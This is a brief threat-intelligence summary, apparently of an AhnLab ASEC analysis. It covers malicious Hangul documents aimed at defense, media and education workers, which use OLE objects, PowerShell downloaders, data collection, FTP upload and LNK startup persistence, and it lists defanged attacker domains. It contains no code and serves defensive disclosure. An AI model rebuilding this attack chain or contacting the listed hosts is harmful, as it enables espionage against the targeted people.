AhnLab ASEC analyzed malicious Hangul documents aimed at people in defense, media, unification, education, and broadcasting related fields. One cluster used oversized embedded OLE objects to make nearly any click in the document trigger a connection to attacker URLs such as host.sharingdocument[.]one or mail.smartprivacyc[.]com, with per-document parameters suggesting targeted delivery. A second cluster embedded batch and text files that launched PowerShell, fetched obfuscated scripts from a GitHub repository, collected recent file lists, network configuration, and process data, and uploaded the results to an FTP server at plm.myartsonline[.]com. The same script chain created startup persistence through an LNK file and thumbs.log so the PowerShell downloader would run again after reboot.